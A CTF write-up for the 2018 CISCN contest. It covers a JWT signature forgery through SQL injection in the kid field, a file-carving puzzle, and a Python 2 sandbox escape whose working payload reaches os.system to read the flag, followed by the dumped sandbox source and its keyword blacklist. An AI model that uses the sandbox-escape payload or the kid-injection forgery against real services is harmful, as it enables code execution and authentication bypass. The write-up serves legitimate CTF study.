All challenges: https://github.com/findneo/ctfgodown/tree/master/20180430-ciscn

WEB

easyweb

http://114.116.26.217/

Learned a bit about JSON Web Tokens, but didn't expect the solution to be a wild guess. (It was probably just an unintended solution.)

Log in with the account admin and an empty password.

ciscn{2a36b5f78a1d6a107212d82ee133c421}

Someone in the group said the HMAC key is stored in the database and that kid is an injection point: a UNION query lets you control the query result, and then you can forge the signature.

From the start of the contest through trying to reproduce it afterwards, I kept getting stuck on alg being sha256. I assumed the key was used as a salt, so I salted by hand in random ways and got nowhere. After looking into it more carefully: HMAC can be thought of as a fairly elaborate "salting" algorithm, so doing it by hand is pointless, and JWT doesn't support plain sha256 anyway.

It turned out that changing sha256 to HS256 was all it took. There are two possibilities: either the backend hardcodes the algorithm as HS256 and merely writes sha256 in the header, or the algorithm is chosen from the value of alg, and since we passed HS256 it computed with HS256.

Testing showed the backend doesn't even care whether alg is present at all... so stay flexible when solving.

The kid value can be anything, as long as it is odd enough that the lookup returns no rows; then the value from our UNION query becomes the key that is used.
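The verifier below is an added example written for this writeup, not code from the challenge or its backend. It shows the two controls whose absence the writeup relies on: the signing algorithm is pinned to HS256 on the server side instead of being read from the header, and the key is fetched by kid through a parameterised query, with an unknown kid rejected outright rather than whatever the query happens to return being used as the key. The table name jwt_keys, the demo secret and the in-memory SQLite store are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json
import sqlite3


def b64url(data):
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    """Inverse of b64url; re-adds the padding the token strips."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header, payload, key):
    """Build header.payload.signature with HMAC-SHA256 over the first two segments."""
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def make_key_store():
    """Constructed in-memory table standing in for the challenge's key table (kid -> secret)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jwt_keys (kid TEXT PRIMARY KEY, secret BLOB NOT NULL)")
    db.execute("INSERT INTO jwt_keys VALUES (?, ?)", ("k1", b"constructed-demo-secret"))
    return db


def lookup_key(db, kid):
    """Parameterised lookup: kid is bound as data, so it can never alter the SQL.
    An unknown kid yields None, which the caller must treat as a hard failure
    rather than falling back to whatever the query returned."""
    row = db.execute("SELECT secret FROM jwt_keys WHERE kid = ?", (kid,)).fetchone()
    return row[0] if row else None


def verify(token, db):
    """Return the payload if the token is valid under the pinned HS256 policy, else None."""
    try:
        h_b64, p_b64, s_b64 = token.split(".")
        header = json.loads(b64url_decode(h_b64))
        # Pin the algorithm server-side instead of trusting the header's alg value.
        if header.get("alg") != "HS256":
            return None
        kid = header.get("kid")
        if not isinstance(kid, str):
            return None
        key = lookup_key(db, kid)
        if key is None:
            return None
        expected = hmac.new(key, (h_b64 + "." + p_b64).encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s_b64)):
            return None
        return json.loads(b64url_decode(p_b64))
    except (ValueError, TypeError, AttributeError):
        return None


if __name__ == "__main__":
    store = make_key_store()
    token = sign_hs256({"typ": "JWT", "alg": "HS256", "kid": "k1"},
                       {"user": "admin"}, b"constructed-demo-secret")
    print(verify(token, store))
```

The constant-time comparison and the explicit None path for a missing kid are the important details: a lookup that silently returns a caller-influenced row, or a comparison that accepts an empty or missing signature, is what turns a kid parameter into a signature-forgery primitive.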

Reference:

MISC

Captcha

This challenge is captcha cracking: contestants must crack the captcha within the specified time and get the flag on success. Log in with the team token. Reference data: https://share.weiyun.com/6e055fc3402e86c7cbb5384f1a6b41b8

https://game.captcha.qq.com/hslj/html/hslj/

The challenge had some problems, so I played it by hand for a while.

ciscn{12qiftb1qj12mbzm1xmjd2iix2ibqz7i}

Later it was changed to entering the captcha to get the flag.

picture

Find the password in the picture.

Attachment download

binwalk -e extracts two files, 97E4 and 97E4.zlib; the latter is the zlib-compressed form of the former.

```python
# Python 2: confirm that 97E4.zlib is just 97E4 compressed with zlib
import zlib
print zlib.decompress(open('97E4.zlib','rb').read())==open('97E4','rb').read()
# got True
```

The base64-decoded content of file 97E4, after a little processing, is an encrypted archive.

```python
# Python 2: base64-decode 97E4, then swap every pair of bytes
# (the decoded data is stored with adjacent bytes exchanged)
import base64
t=open('97E4','rb').read()
m=base64.b64decode(t).encode("hex")   # hex string, two characters per byte
n=''
for i in range(len(m)/4):             # walk the hex string in 16-bit (4-character) units
	n+=m[i*4+2:i*4+4]+m[i*4:i*4+2]    # emit the second byte before the first
print n
```

Roughly as follows:

Comparing gives the password: integer division or modulo by zero

This yields an encoded string:

Decoding it gives CISCN{C16E6F6E065DA0306E318D095C68BDC0}
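The following is an added Python 3 example, not the original solve script: it performs the same pair-swap as the hex loop above but on bytes, keeps a trailing odd byte instead of dropping it, and recognises the result by the zip local-file-header signature rather than by eyeballing the output. The sample blob is constructed for the example and is not the challenge's 97E4 data.

```python
import base64

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # magic bytes at the start of a zip local file header


def swap16(data):
    """Swap every adjacent byte pair (the transform the page's hex loop performs);
    a trailing odd byte is left in place instead of being dropped."""
    out = bytearray()
    for i in range(0, len(data) - 1, 2):
        out += bytes((data[i + 1], data[i]))
    if len(data) % 2:
        out.append(data[-1])
    return bytes(out)


def recover_archive(blob_b64):
    """Base64-decode the blob and return (label, bytes) for the first form that
    carries a zip signature, trying the raw bytes and then the pair-swapped bytes.
    Returns (None, raw) when neither looks like an archive."""
    raw = base64.b64decode(blob_b64)
    for label, candidate in (("as-is", raw), ("byte-swapped", swap16(raw))):
        if candidate.startswith(ZIP_LOCAL_HEADER):
            return label, candidate
    return None, raw


# Constructed sample standing in for 97E4: a fake archive prefix (odd length on
# purpose), pair-swapped and then base64-encoded.
SAMPLE_PLAIN = b"PK\x03\x04" + b"constructed sample payload!"
SAMPLE_B64 = base64.b64encode(swap16(SAMPLE_PLAIN))
NOT_ARCHIVE_B64 = base64.b64encode(b"just some text")

if __name__ == "__main__":
    label, data = recover_archive(SAMPLE_B64)
    print(label, data[:4])
```

Checking for the signature after each candidate transform is a cheap way to avoid guessing: an encrypted zip still has a readable local header, so a correct un-mangling is visible before any password is tried.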

run

Reference link:

payload:

```python
print ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ca'+'t'+' /home/ctf/5c72a1d444cf3121a5d25f2db4147ebb')
# ciscn{db87226edc7f9aff82a6b524053eef9e}
```

I also dumped a few files along the way.

cpython.py

```python
from ctypes import pythonapi,POINTER,py_object

# _PyObject_GetDictPtr returns a pointer to the object's __dict__ slot;
# reading it through ctypes yields the real, writable dict behind a type's
# read-only mappingproxy, which is what sandbox.py uses to strip attributes.
_get_dict = pythonapi._PyObject_GetDictPtr
_get_dict.restype = POINTER(py_object)
_get_dict.argtypes = [py_object]

del pythonapi,POINTER,py_object

def get_dict(ob):
    return _get_dict(ob).contents.value
```

sandbox.py

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2018-04-09 23:30:58
# @Author  : Xu (you@example.org)
# @Link    : https://xuccc.github.io/
# @Version : $Id$

from sys import modules
from cpython import get_dict   # get_dict (cpython.py above) exposes a type's __dict__ as a writable dict
from types import FunctionType

main  = modules['__main__'].__dict__
origin_builtins = main['__builtins__'].__dict__

def delete_type():
    type_dict = get_dict(type)
    del type_dict['__bases__']
    del type_dict['__subclasses__']

def delete_func_code():
    func_dict = get_dict(FunctionType)
    del func_dict['func_code']

def safe_import(__import__,whiteList):
    def importer(name,globals={},locals={},fromlist=[],level=-1):
        if name in whiteList:
            return __import__(name,globals,locals,fromlist,level)
        else:
            print "HAHA,[%s]  has been banned~" % name
    return importer

class ReadOnly(dict):
    """docstring for ReadOnlu"""
    def __delitem__(self,keys):
        raise ValueError(":(")
    def pop(self,key,default=None):
        raise ValueError(":(")
    def popitem(self):
        raise ValueError(":(")
    def setdefault(self,key,value):
        raise ValueError(":(")
    def __setitem__(self,key,value):
        raise ValueError(":(")
    def __setattr__(self, name, value):
        raise ValueError(":(")
    def update(self,dict,**kwargs):
        raise ValueError(":(")

def builtins_clear():
    whiteList = "raw_input  SyntaxError   ValueError  NameError  Exception __import__".split(" ")
    for mod in __builtins__.__dict__.keys():
        if mod not in whiteList:
            del __builtins__.__dict__[mod]

def input_filter(string):
    # substring blacklist on the raw text; literals built from pieces like 'o'+'s' are not matched
    ban = "exec eval pickle os subprocess input sys ls cat".split(" ")
    for i in ban:
        if i in string.lower():
            print "{} has been banned!".format(i)
            return ""
    return string

# delete_type();   # never called, so type.__bases__ / __subclasses__ stay reachable
del delete_type
delete_func_code();del delete_func_code
builtins_clear();del builtins_clear


whiteMod = []
origin_builtins['__import__'] = safe_import(__import__,whiteMod)
safe_builtins = ReadOnly(origin_builtins);del ReadOnly
main['__builtins__'] = safe_builtins;del safe_builtins

del get_dict,modules,origin_builtins,safe_import,whiteMod,main,FunctionType
del __builtins__, __doc__, __file__, __name__, __package__

print """
  ____
 |  _ \ _   _ _ __
 | |_) | | | | '_ \
 |  _ <| |_| | | | |
 |_| \_\\__,_|_| |_|


Escape from the dark house built with python :)

Try to getshell then find the flag!

"""

while 1:
    inp = raw_input('>>>')
    cmd = input_filter(inp)
    try:
        exec cmd
    except NameError, e:
        print "wow something lose!We can\'t find it !  D:"
    except SyntaxError,e:
        print "Noob! Synax Wrong! :("
    except Exception,e:
        print "unknow error,try again  :>"
```

/home/ctf/bin

Challenge backup

https://github.com/findneo/ctfgodown/tree/master/20180430-ciscn